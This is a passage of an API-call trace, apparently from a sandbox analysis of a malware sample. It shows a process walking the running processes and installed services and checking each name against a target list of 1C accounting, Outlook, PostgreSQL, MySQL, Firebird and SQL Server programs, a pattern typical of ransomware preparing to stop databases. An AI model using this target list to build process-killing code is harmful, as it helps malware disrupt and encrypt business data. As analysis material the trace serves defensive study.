	[0136.836] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0136.836] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0136.837] lstrlenW (lpString="lsass.exe") returned 9
	[0136.837] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0136.837] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0136.837] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0136.837] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0136.837] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0136.837] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0136.837] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0136.837] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0136.837] lstrlenW (lpString="lsm.exe") returned 7
	[0136.837] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0136.837] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0136.837] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0136.837] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0136.837] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0136.837] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0136.837] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0136.838] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.838] lstrlenW (lpString="svchost.exe") returned 11
	[0136.838] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0136.838] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.838] lstrlenW (lpString="svchost.exe") returned 11
	[0136.838] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0136.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0136.839] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.839] lstrlenW (lpString="svchost.exe") returned 11
	[0136.839] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0136.839] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.839] lstrlenW (lpString="svchost.exe") returned 11
	[0136.839] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0136.839] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0136.840] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0136.840] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0136.840] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.840] lstrlenW (lpString="svchost.exe") returned 11
	[0136.840] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.840] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.840] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.840] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0136.840] lstrlenW (lpString="audiodg.exe") returned 11
	[0136.840] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.841] lstrlenW (lpString="svchost.exe") returned 11
	[0136.841] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.841] lstrlenW (lpString="svchost.exe") returned 11
	[0136.841] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0136.841] lstrlenW (lpString="spoolsv.exe") returned 11
	[0136.841] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.842] lstrlenW (lpString="svchost.exe") returned 11
	[0136.842] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0136.842] lstrlenW (lpString="taskhost.exe") returned 12
	[0136.842] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0136.842] lstrlenW (lpString="userinit.exe") returned 12
	[0136.842] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0136.843] lstrlenW (lpString="dwm.exe") returned 7
	[0136.843] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0136.843] lstrlenW (lpString="explorer.exe") returned 12
	[0136.843] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0136.843] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0136.843] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0136.844] lstrlenW (lpString="dllhost.exe") returned 11
	[0136.844] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0136.844] lstrlenW (lpString="reader_sl.exe") returned 13
	[0136.844] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0136.844] lstrlenW (lpString="cmd.exe") returned 7
	[0136.844] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0136.844] lstrlenW (lpString="conhost.exe") returned 11
	[0136.844] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0
	[0136.845] CloseHandle (hObject=0x130) returned 1
	[0136.845] Sleep (dwMilliseconds=0x1f4) 
	[0137.598] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb51cad0
	[0137.708] EnumServicesStatusExW (in: hSCManager=0xb51cad0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0137.708] GetLastError () returned 0xea
	[0137.708] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb564d98
	[0137.708] EnumServicesStatusExW (in: hSCManager=0xb51cad0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb564d98, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb564d98, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0137.709] CloseServiceHandle (hSCObject=0xb51cad0) returned 1
	[0137.709] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0137.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0137.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0137.709] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0137.709] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0137.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0137.709] lstrlenW (lpString="AudioSrv") returned 8
	[0137.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0137.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0137.709] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0137.709] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0137.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0137.709] lstrlenW (lpString="BFE") returned 3
	[0137.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0137.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0137.710] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0137.710] lstrlenW (lpString="CryptSvc") returned 8
	[0137.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0137.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0137.710] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0137.710] lstrlenW (lpString="CscService") returned 10
	[0137.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0137.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0137.710] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0137.710] lstrlenW (lpString="DcomLaunch") returned 10
	[0137.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0137.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0137.710] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0137.710] lstrlenW (lpString="Dhcp") returned 4
	[0137.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0137.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0137.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0137.710] lstrlenW (lpString="Dnscache") returned 8
	[0137.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0137.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0137.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0137.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0137.710] lstrlenW (lpString="DPS") returned 3
	[0137.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0137.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0137.711] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0137.711] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0137.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0137.711] lstrlenW (lpString="eventlog") returned 8
	[0137.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0137.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0137.711] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0137.711] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0137.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0137.711] lstrlenW (lpString="EventSystem") returned 11
	[0137.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0137.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0137.711] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0137.711] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0137.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0137.711] lstrlenW (lpString="gpsvc") returned 5
	[0137.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0137.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0137.711] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0137.711] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0137.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0137.711] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0137.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0137.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0137.711] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0137.711] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0137.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0137.711] lstrlenW (lpString="lmhosts") returned 7
	[0137.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0137.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0137.711] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0137.711] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0137.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0137.712] lstrlenW (lpString="MMCSS") returned 5
	[0137.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0137.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0137.712] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0137.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0137.712] lstrlenW (lpString="MpsSvc") returned 6
	[0137.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0137.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0137.712] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0137.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0137.712] lstrlenW (lpString="NlaSvc") returned 6
	[0137.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0137.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0137.712] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0137.712] lstrlenW (lpString="nsi") returned 3
	[0137.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0137.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0137.712] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0137.712] lstrlenW (lpString="PcaSvc") returned 6
	[0137.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0137.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0137.712] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0137.712] lstrlenW (lpString="PlugPlay") returned 8
	[0137.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0137.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0137.712] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0137.713] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0137.713] lstrlenW (lpString="Power") returned 5
	[0137.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0137.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0137.713] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0137.713] lstrlenW (lpString="ProfSvc") returned 7
	[0137.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0137.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0137.713] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0137.713] lstrlenW (lpString="RpcEptMapper") returned 12
	[0137.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0137.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0137.713] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0137.713] lstrlenW (lpString="RpcSs") returned 5
	[0137.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0137.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0137.713] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0137.713] lstrlenW (lpString="SamSs") returned 5
	[0137.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0137.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0137.713] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0137.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0137.713] lstrlenW (lpString="Schedule") returned 8
	[0137.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0137.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0137.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0137.714] lstrlenW (lpString="SENS") returned 4
	[0137.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0137.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0137.714] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0137.714] lstrlenW (lpString="ShellHWDetection") returned 16
	[0137.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0137.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
